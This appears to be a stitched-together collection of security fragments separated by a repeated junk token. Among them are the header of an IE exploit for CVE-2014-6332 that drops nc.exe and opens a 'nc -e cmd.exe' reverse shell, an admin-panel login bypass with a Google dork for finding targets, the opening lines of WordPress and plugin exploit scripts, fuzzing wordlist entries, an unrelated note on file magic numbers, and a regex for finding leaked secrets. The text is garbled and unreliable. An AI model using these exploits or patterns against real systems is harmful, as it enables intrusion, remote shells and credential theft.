hxlxmj

<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target

Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windoes 8.1 64-bit (EPM is off)

hxlxmj

File Magic Numbers

Magic numbers are the first bits of a file which uniquely identify the type of file. This makes programming easier because complicated file structures need not be searched in order to identify the file type.

For example, a jpeg file starts with ffd8 ffe0 0010 4a46 4946 0001 0101 0047 ......JFIF.....G ffd8 shows that it's a JPEG file, and ffe0 identify a JFIF type structure. There is an ascii encoding of "JFIF" which comes after a length code, but that is not necessary in order to identify the file. The first 4 bytes do that uniquely.

This gives an ongoing list of file-type magic numbers.

Image Files

hxlxmj

Exploit Title: Supercon Direct login to admin panel without entering password
Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices”
Product Description
——————-
Supercon delivers high quality, reliable and cost-effective IT services to customers globally.
We provide world-class technology services by constantly exploring and implementing innovative
solutions that drive long-term value to our customers. We have been providing solutions to clients
across the globe for more than 5 years and boast of our extensive
experience on website designing and development projects.

hxlxmj

`
~/
~
ים
   
 
___
__
_

hxlxmj

.
..
........
@
*
*.*
*.*.*
🐎

hxlxmj

/
$$$lang-translate.service.js.aspx
$367-Million-Merger-Blocked.html
$defaultnav
${idfwbonavigation}.xml
$_news.php
$search2
£º
.0
/0

hxlxmj

0
1
11
12
13
14
15
16
17
2

hxlxmj

# It's Work to you test if the vulnerability is working
# use only to test your system
# use with responsability
#
# use method:
# test-WP-CVE-2017-8295.sh [YOUR-SITE-TO-TEST] [USER-TO-TEST]
# ex: test-WP-CVE-2017-8295.sh example.com user


curl --write-out %{http_code} --silent --output ~/body.txt \

hxlxmj

function randomInt(min, max) {
  return Math.floor(Math.random() * (max - min + 1)) + min;
}

jQuery(document).ready(function($){
	username = "poctesting"+randomInt(1,1337);
	password_poc = "S3cr3t"+randomInt(1,1337);
	nonce = stm_lms_nonces.stm_lms_register

	post_data = {

hxlxmj

(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k